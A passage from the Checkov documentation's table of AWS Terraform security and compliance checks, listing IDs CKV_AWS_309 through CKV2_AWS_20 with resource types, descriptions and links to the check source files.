[APIGatewayMethodSettingsCacheEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayMethodSettingsCacheEncrypted.py) | -| 438 | CKV_AWS_309 | resource | aws_apigatewayv2_route | Ensure API GatewayV2 routes specify an authorization type | Terraform | [APIGatewayV2RouteDefinesAuthorizationType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayV2RouteDefinesAuthorizationType.py) | -| 439 | CKV_AWS_310 | resource | aws_cloudfront_distribution | Ensure CloudFront distributions should have origin failover configured | Terraform | [CloudfrontDistributionOriginFailover.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionOriginFailover.py) | -| 440 | CKV_AWS_311 | resource | aws_codebuild_project | Ensure that CodeBuild S3 logs are encrypted | Terraform | [CodebuildS3LogsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodebuildS3LogsEncrypted.py) | -| 441 | CKV_AWS_312 | resource | aws_elastic_beanstalk_environment | Ensure Elastic Beanstalk environments have enhanced health reporting enabled | Terraform | [ElasticBeanstalkUseEnhancedHealthChecks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticBeanstalkUseEnhancedHealthChecks.py) | -| 442 | CKV_AWS_313 | resource | aws_rds_cluster | Ensure RDS cluster configured to copy tags to snapshots | Terraform | [RDSClusterCopyTags.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterCopyTags.py) | -| 443 | CKV_AWS_314 | resource | aws_codebuild_project | Ensure CodeBuild project environments have a logging configuration | Terraform | [CodebuildHasLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodebuildHasLogs.py) | -| 444 | CKV_AWS_315 | resource | aws_autoscaling_group | Ensure EC2 Auto Scaling groups use EC2 launch templates | Terraform | [AutoScalingLaunchTemplate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AutoScalingLaunchTemplate.py) | -| 445 | CKV_AWS_316 | resource | aws_codebuild_project | Ensure CodeBuild project environments do not have privileged mode enabled | Terraform | [CodeBuildPrivilegedMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodeBuildPrivilegedMode.py) | -| 446 | CKV_AWS_317 | resource | aws_elasticsearch_domain | Ensure Elasticsearch Domain Audit Logging is enabled | Terraform | [ElasticsearchDomainAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainAuditLogging.py) | -| 447 | CKV_AWS_317 | resource | aws_opensearch_domain | Ensure Elasticsearch Domain Audit Logging is enabled | Terraform | [ElasticsearchDomainAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainAuditLogging.py) | -| 448 | CKV_AWS_318 | resource | aws_elasticsearch_domain | Ensure Elasticsearch domains are configured with at least three dedicated master nodes for HA | Terraform | [ElasticsearchDomainHA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainHA.py) | -| 449 | CKV_AWS_318 | resource | aws_opensearch_domain | Ensure Elasticsearch domains are configured with at least three dedicated master nodes for HA | Terraform | [ElasticsearchDomainHA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainHA.py) | -| 450 | CKV_AWS_319 | resource | aws_cloudwatch_metric_alarm | Ensure that CloudWatch alarm actions are enabled | Terraform | [CloudWatchAlarmsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudWatchAlarmsEnabled.py) | -| 451 | CKV_AWS_320 | resource | aws_redshift_cluster | Ensure Redshift clusters do not use the default database name | Terraform | [RedshiftClusterDatabaseName.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterDatabaseName.py) | -| 452 | CKV_AWS_321 | resource | aws_redshift_cluster | Ensure Redshift clusters use enhanced VPC routing | Terraform | [RedshiftClusterUseEnhancedVPCRouting.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterUseEnhancedVPCRouting.py) | -| 453 | CKV_AWS_322 | resource | aws_elasticache_cluster | Ensure ElastiCache for Redis cache clusters have auto minor version upgrades enabled | Terraform | [ElasticCacheAutomaticMinorUpgrades.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticCacheAutomaticMinorUpgrades.py) | -| 454 | CKV_AWS_323 | resource | aws_elasticache_cluster | Ensure ElastiCache clusters do not use the default subnet group | Terraform | [ElastiCacheHasCustomSubnet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElastiCacheHasCustomSubnet.py) | -| 455 | CKV_AWS_324 | resource | aws_rds_cluster | Ensure that RDS Cluster log capture is enabled | Terraform | [RDSClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterLogging.py) | -| 456 | CKV_AWS_325 | resource | aws_rds_cluster | Ensure that RDS Cluster audit logging is enabled for MySQL engine | Terraform | [RDSClusterAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterAuditLogging.py) | -| 457 | CKV_AWS_326 | resource | aws_rds_cluster | Ensure that RDS Aurora Clusters have backtracking enabled | Terraform | [RDSClusterAuroraBacktrack.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterAuroraBacktrack.py) | -| 458 | CKV_AWS_327 | resource | aws_rds_cluster | Ensure RDS Clusters are encrypted using KMS CMKs | Terraform | [RDSClusterEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterEncryptedWithCMK.py) | -| 459 | CKV_AWS_328 | resource | aws_alb | Ensure that ALB is configured with defensive or strictest desync mitigation mode | Terraform | [ALBDesyncMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBDesyncMode.py) | -| 460 | CKV_AWS_328 | resource | aws_elb | Ensure that ALB is configured with defensive or strictest desync mitigation mode | Terraform | [ALBDesyncMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBDesyncMode.py) | -| 461 | CKV_AWS_328 | resource | aws_lb | Ensure that ALB is configured with defensive or strictest desync mitigation mode | Terraform | [ALBDesyncMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBDesyncMode.py) | -| 462 | CKV_AWS_329 | resource | aws_efs_access_point | EFS access points should enforce a root directory | Terraform | [EFSAccessPointRoot.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EFSAccessPointRoot.py) | -| 463 | CKV_AWS_330 | resource | aws_efs_access_point | EFS access points should enforce a user identity | Terraform | [EFSAccessUserIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EFSAccessUserIdentity.py) | -| 464 | CKV_AWS_331 | resource | aws_ec2_transit_gateway | Ensure Transit Gateways do not automatically accept VPC attachment requests | Terraform | [Ec2TransitGatewayAutoAccept.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/Ec2TransitGatewayAutoAccept.py) | -| 465 | CKV_AWS_332 | resource | aws_ecs_service | Ensure ECS Fargate services run on the latest Fargate platform version | Terraform | [ECSServiceFargateLatest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSServiceFargateLatest.py) | -| 466 | CKV_AWS_333 | resource | aws_ecs_service | Ensure ECS services do not have public IP addresses assigned to them automatically | Terraform | [ECSServicePublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSServicePublicIP.py) | -| 467 | CKV_AWS_334 | resource | aws_ecs_task_definition | Ensure ECS containers should run as non-privileged | Terraform | [ECSContainerPrivilege.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSContainerPrivilege.py) | -| 468 | CKV_AWS_335 | resource | aws_ecs_task_definition | Ensure ECS task definitions should not share the host's process namespace | Terraform | [ECSContainerHostProcess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSContainerHostProcess.py) | -| 469 | CKV_AWS_336 | resource | aws_ecs_task_definition | Ensure ECS containers are limited to read-only access to root filesystems | Terraform | [ECSContainerReadOnlyRoot.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSContainerReadOnlyRoot.py) | -| 470 | CKV_AWS_337 | resource | aws_ssm_parameter | Ensure SSM parameters are using KMS CMK | Terraform | [SSMParameterUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SSMParameterUsesCMK.py) | -| 471 | CKV_AWS_338 | resource | aws_cloudwatch_log_group | Ensure CloudWatch log groups retains logs for at least 1 year | Terraform | [CloudWatchLogGroupRetentionYear.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudWatchLogGroupRetentionYear.py) | -| 472 | CKV_AWS_339 | resource | aws_eks_cluster | Ensure EKS clusters run on a supported Kubernetes version | Terraform | [EKSPlatformVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSPlatformVersion.py) | -| 473 | CKV_AWS_340 | resource | aws_elastic_beanstalk_environment | Ensure Elastic Beanstalk managed platform updates are enabled | Terraform | [ElasticBeanstalkUseManagedUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticBeanstalkUseManagedUpdates.py) | -| 474 | CKV_AWS_341 | resource | aws_launch_configuration | Ensure Launch template should not have a metadata response hop limit greater than 1 | Terraform | [LaunchTemplateMetadataHop.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LaunchTemplateMetadataHop.py) | -| 475 | CKV_AWS_341 | resource | aws_launch_template | Ensure Launch template should not have a metadata response hop limit greater than 1 | Terraform | [LaunchTemplateMetadataHop.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LaunchTemplateMetadataHop.py) | -| 476 | CKV_AWS_342 | resource | aws_waf_rule_group | Ensure WAF rule has any actions | Terraform | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py) | -| 477 | CKV_AWS_342 | resource | aws_waf_web_acl | Ensure WAF rule has any actions | Terraform | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py) | -| 478 | CKV_AWS_342 | resource | aws_wafregional_rule_group | Ensure WAF rule has any actions | Terraform | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py) | -| 479 | CKV_AWS_342 | resource | aws_wafregional_web_acl | Ensure WAF rule has any actions | Terraform | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py) | -| 480 | CKV_AWS_342 | resource | aws_wafv2_rule_group | Ensure WAF rule has any actions | Terraform | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py) | -| 481 | CKV_AWS_342 | resource | aws_wafv2_web_acl | Ensure WAF rule has any actions | Terraform | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py) | -| 482 | CKV_AWS_343 | resource | aws_redshift_cluster | Ensure Amazon Redshift clusters should have automatic snapshots enabled | Terraform | [RedshiftClusterAutoSnap.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterAutoSnap.py) | -| 483 | CKV_AWS_344 | resource | aws_networkfirewall_firewall | Ensure that Network firewalls have deletion protection enabled | Terraform | [NetworkFirewallDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkFirewallDeletionProtection.py) | -| 484 | CKV_AWS_345 | resource | aws_networkfirewall_firewall | Ensure that Network firewall encryption is via a CMK | Terraform | [NetworkFirewallUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkFirewallUsesCMK.py) | -| 485 | CKV_AWS_345 | resource | aws_networkfirewall_rule_group | Ensure that Network firewall encryption is via a CMK | Terraform | [NetworkFirewallUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkFirewallUsesCMK.py) | -| 486 | CKV_AWS_346 | resource | aws_networkfirewall_firewall_policy | Ensure Network Firewall Policy defines an encryption configuration that uses a customer managed Key (CMK) | Terraform | [NetworkFirewallPolicyDefinesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkFirewallPolicyDefinesCMK.py) | -| 487 | CKV_AWS_347 | resource | aws_neptune_cluster | Ensure Neptune is encrypted by KMS using a customer managed Key (CMK) | Terraform | [NeptuneClusterEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterEncryptedWithCMK.py) | -| 488 | CKV_AWS_348 | resource | aws_iam_access_key | Ensure IAM root user doesnt have Access keys | Terraform | [IAMUserRootAccessKeys.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMUserRootAccessKeys.py) | -| 489 | CKV_AWS_349 | resource | aws_emr_security_configuration | Ensure EMR Cluster security configuration encrypts local disks | Terraform | [EMRClusterConfEncryptsLocalDisk.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EMRClusterConfEncryptsLocalDisk.py) | -| 490 | CKV_AWS_350 | resource | aws_emr_security_configuration | Ensure EMR Cluster security configuration encrypts EBS disks | Terraform | [EMRClusterConfEncryptsEBS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EMRClusterConfEncryptsEBS.py) | -| 491 | CKV_AWS_351 | resource | aws_emr_security_configuration | Ensure EMR Cluster security configuration encrypts InTransit | Terraform | [EMRClusterConfEncryptsInTransit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EMRClusterConfEncryptsInTransit.py) | -| 492 | CKV_AWS_352 | resource | aws_network_acl_rule | Ensure NACL ingress does not allow all Ports | Terraform | [NetworkACLUnrestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestricted.py) | -| 493 | CKV_AWS_353 | resource | aws_db_instance | Ensure that RDS instances have performance insights enabled | Terraform | [RDSInstancePerformanceInsights.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstancePerformanceInsights.py) | -| 494 | CKV_AWS_353 | resource | aws_rds_cluster_instance | Ensure that RDS instances have performance insights enabled | Terraform | [RDSInstancePerformanceInsights.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstancePerformanceInsights.py) | -| 495 | CKV_AWS_354 | resource | aws_db_instance | Ensure RDS Performance Insights are encrypted using KMS CMKs | Terraform | [RDSInstancePerfInsightsEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstancePerfInsightsEncryptionWithCMK.py) | -| 496 | CKV_AWS_354 | resource | aws_rds_cluster_instance | Ensure RDS Performance Insights are encrypted using KMS CMKs | Terraform | [RDSInstancePerfInsightsEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstancePerfInsightsEncryptionWithCMK.py) | -| 497 | CKV_AWS_355 | resource | aws_iam_group_policy | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions | Terraform | [IAMStarResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarResourcePolicyDocument.py) | -| 498 | CKV_AWS_355 | resource | aws_iam_policy | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions | Terraform | [IAMStarResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarResourcePolicyDocument.py) | -| 499 | CKV_AWS_355 | resource | aws_iam_role_policy | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions | Terraform | [IAMStarResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarResourcePolicyDocument.py) | -| 500 | CKV_AWS_355 | resource | aws_iam_user_policy | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions | Terraform | [IAMStarResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarResourcePolicyDocument.py) | -| 501 | CKV_AWS_355 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions | Terraform | [IAMStarResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarResourcePolicyDocument.py) | -| 502 | CKV_AWS_356 | data | aws_iam_policy_document | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions | Terraform | [ResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/ResourcePolicyDocument.py) | -| 503 | CKV_AWS_357 | resource | aws_transfer_server | Ensure Transfer Server allows only secure protocols | Terraform | [TransferServerAllowsOnlySecureProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/TransferServerAllowsOnlySecureProtocols.py) | -| 504 | CKV_AWS_358 | data | aws_iam_policy_document | Ensure GitHub Actions OIDC trust policies only allows actions from a specific known organization | Terraform | [GithubActionsOIDCTrustPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/GithubActionsOIDCTrustPolicy.py) | -| 505 | CKV_AWS_359 | resource | aws_neptune_cluster | Neptune DB clusters should have IAM database authentication enabled | Terraform | [NeptuneDBClustersIAMDatabaseAuthenticationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneDBClustersIAMDatabaseAuthenticationEnabled.py) | -| 506 | CKV_AWS_360 | resource | aws_docdb_cluster | Ensure DocumentDB has an adequate backup retention period | Terraform | [DocDBBackupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBBackupRetention.py) | -| 507 | CKV_AWS_361 | resource | aws_neptune_cluster | Ensure that Neptune DB cluster has automated backups enabled with adequate retention | Terraform | [NeptuneClusterBackupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterBackupRetention.py) | -| 508 | CKV_AWS_362 | resource | aws_neptune_cluster | Neptune DB clusters should be configured to copy tags to snapshots | Terraform | [NeptuneDBClustersCopyTagsToSnapshots.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneDBClustersCopyTagsToSnapshots.py) | -| 509 | CKV_AWS_363 | resource | aws_lambda_function | Ensure Lambda Runtime is not deprecated | Terraform | [DeprecatedLambdaRuntime.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DeprecatedLambdaRuntime.py) | -| 510 | CKV_AWS_364 | resource | aws_lambda_permission | Ensure that AWS Lambda function permissions delegated to AWS services are limited by SourceArn or SourceAccount | Terraform | [LambdaServicePermission.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaServicePermission.py) | -| 511 | CKV_AWS_365 | resource | aws_ses_configuration_set | Ensure SES Configuration Set enforces TLS usage | Terraform | [SesConfigurationSetDefinesTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SesConfigurationSetDefinesTLS.py) | -| 512 | CKV2_AWS_1 | resource | aws_network_acl | Ensure that all NACL are attached to subnets | Terraform | [SubnetHasACL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SubnetHasACL.yaml) | -| 513 | CKV2_AWS_1 | resource | aws_subnet | Ensure that all NACL are attached to subnets | Terraform | [SubnetHasACL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SubnetHasACL.yaml) | -| 514 | CKV2_AWS_2 | resource | aws_ebs_volume | Ensure that only encrypted EBS volumes are attached to EC2 instances | Terraform | [EncryptedEBSVolumeOnlyConnectedToEC2s.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EncryptedEBSVolumeOnlyConnectedToEC2s.yaml) | -| 515 | CKV2_AWS_2 | resource | aws_volume_attachment | Ensure that only encrypted EBS volumes are attached to EC2 instances | Terraform | [EncryptedEBSVolumeOnlyConnectedToEC2s.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EncryptedEBSVolumeOnlyConnectedToEC2s.yaml) | -| 516 | CKV2_AWS_3 | resource | aws_guardduty_detector | Ensure GuardDuty is enabled to specific org/region | Terraform | [GuardDutyIsEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/GuardDutyIsEnabled.yaml) | -| 517 | CKV2_AWS_3 | resource | aws_guardduty_organization_configuration | Ensure GuardDuty is enabled to specific org/region | Terraform | [GuardDutyIsEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/GuardDutyIsEnabled.yaml) | -| 518 | CKV2_AWS_4 | resource | aws_api_gateway_method_settings | Ensure API Gateway stage have logging level defined as appropriate | Terraform | [APIGWLoggingLevelsDefinedProperly.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGWLoggingLevelsDefinedProperly.yaml) | -| 519 | CKV2_AWS_4 | resource | aws_api_gateway_stage | Ensure API Gateway stage have logging level defined as appropriate | Terraform | [APIGWLoggingLevelsDefinedProperly.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGWLoggingLevelsDefinedProperly.yaml) | -| 520 | CKV2_AWS_5 | resource | aws_security_group | Ensure that Security Groups are attached to another resource | Terraform | [SGAttachedToResource.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SGAttachedToResource.yaml) | -| 521 | CKV2_AWS_6 | resource | aws_s3_bucket | Ensure that S3 bucket has a Public Access block | Terraform | [S3BucketHasPublicAccessBlock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketHasPublicAccessBlock.yaml) | -| 522 | CKV2_AWS_6 | resource | aws_s3_bucket_public_access_block | Ensure that S3 bucket has a Public Access block | Terraform | [S3BucketHasPublicAccessBlock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketHasPublicAccessBlock.yaml) | -| 523 | CKV2_AWS_7 | resource | aws_emr_cluster | Ensure that Amazon EMR clusters' security groups are not open to the world | Terraform | [AMRClustersNotOpenToInternet.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AMRClustersNotOpenToInternet.yaml) | -| 524 | CKV2_AWS_7 | resource | aws_security_group | Ensure that Amazon EMR clusters' security groups are not open to the world | Terraform | [AMRClustersNotOpenToInternet.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AMRClustersNotOpenToInternet.yaml) | -| 525 | CKV2_AWS_8 | resource | aws_rds_cluster | Ensure that RDS clusters has backup plan of AWS Backup | Terraform | [RDSClusterHasBackupPlan.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/RDSClusterHasBackupPlan.yaml) | -| 526 | CKV2_AWS_9 | resource | aws_backup_selection | Ensure that EBS are added in the backup plans of AWS Backup | Terraform | [EBSAddedBackup.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EBSAddedBackup.yaml) | -| 527 | CKV2_AWS_10 | resource | aws_cloudtrail | Ensure CloudTrail trails are integrated with CloudWatch Logs | Terraform | [CloudtrailHasCloudwatch.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudtrailHasCloudwatch.yaml) | -| 528 | CKV2_AWS_11 | resource | aws_vpc | Ensure VPC flow logging is enabled in all VPCs | Terraform | [VPCHasFlowLog.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCHasFlowLog.yaml) | -| 529 | CKV2_AWS_12 | resource | aws_default_security_group | Ensure the default security group of every VPC restricts all traffic | Terraform | [VPCHasRestrictedSG.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCHasRestrictedSG.yaml) | -| 530 | CKV2_AWS_12 | resource | aws_vpc | Ensure the default security group of every VPC restricts all traffic | Terraform | [VPCHasRestrictedSG.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCHasRestrictedSG.yaml) | -| 531 | CKV2_AWS_14 | resource | aws_iam_group | Ensure that IAM groups includes at least one IAM user | Terraform | [IAMGroupHasAtLeastOneUser.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMGroupHasAtLeastOneUser.yaml) | -| 532 | CKV2_AWS_14 | resource | aws_iam_group_membership | Ensure that IAM groups includes at least one IAM user | Terraform | [IAMGroupHasAtLeastOneUser.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMGroupHasAtLeastOneUser.yaml) | -| 533 | CKV2_AWS_15 | resource | aws_autoscaling_group | Ensure that auto Scaling groups that are associated with a load balancer are using Elastic Load Balancing health checks. | Terraform | [AutoScallingEnabledELB.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScallingEnabledELB.yaml) | -| 534 | CKV2_AWS_15 | resource | aws_elb | Ensure that auto Scaling groups that are associated with a load balancer are using Elastic Load Balancing health checks. | Terraform | [AutoScallingEnabledELB.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScallingEnabledELB.yaml) | -| 535 | CKV2_AWS_15 | resource | aws_lb_target_group | Ensure that auto Scaling groups that are associated with a load balancer are using Elastic Load Balancing health checks. | Terraform | [AutoScallingEnabledELB.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScallingEnabledELB.yaml) | -| 536 | CKV2_AWS_16 | resource | aws_appautoscaling_target | Ensure that Auto Scaling is enabled on your DynamoDB tables | Terraform | [AutoScalingEnableOnDynamoDBTables.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScalingEnableOnDynamoDBTables.yaml) | -| 537 | CKV2_AWS_16 | resource | aws_dynamodb_table | Ensure that Auto Scaling is enabled on your DynamoDB tables | Terraform | [AutoScalingEnableOnDynamoDBTables.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScalingEnableOnDynamoDBTables.yaml) | -| 538 | CKV2_AWS_18 | resource | aws_backup_selection | Ensure that Elastic File System (Amazon EFS) file systems are added in the backup plans of AWS Backup | Terraform | [EFSAddedBackup.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EFSAddedBackup.yaml) | -| 539 | CKV2_AWS_19 | resource | aws_eip | Ensure that all EIP addresses allocated to a VPC are attached to EC2 instances | Terraform | [EIPAllocatedToVPCAttachedEC2.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EIPAllocatedToVPCAttachedEC2.yaml) | -| 540 | CKV2_AWS_19 | resource | aws_eip_association | Ensure that all EIP addresses allocated to a VPC are attached to EC2 instances | Terraform | [EIPAllocatedToVPCAttachedEC2.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EIPAllocatedToVPCAttachedEC2.yaml) | -| 541 | CKV2_AWS_20 | resource | aws_alb | Ensure that ALB redirects HTTP requests into HTTPS ones | Terraform | [ALBRedirectsHTTPToHTTPS.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBRedirectsHTTPToHTTPS.yaml) | -| 542 | CKV2_AWS_20 | resource | aws_alb_listener | Ensure that ALB redirects HTTP requests into HTTPS ones | Terraform | [ALBRedirectsHTTPToHTTPS.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBRedirectsHTTPToHTTPS.yaml) | -| 543 | CKV2_AWS_20 | resource | aws_lb | Ensure that ALB redirects HTTP requests into HTTPS ones | Terraform | [ALBRedirectsHTTPToHTTPS.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBRedirectsHTTPToHTTPS.yaml) | -| 544 | CKV2_AWS_20 | resource | aws_lb_listener | Ensure that ALB 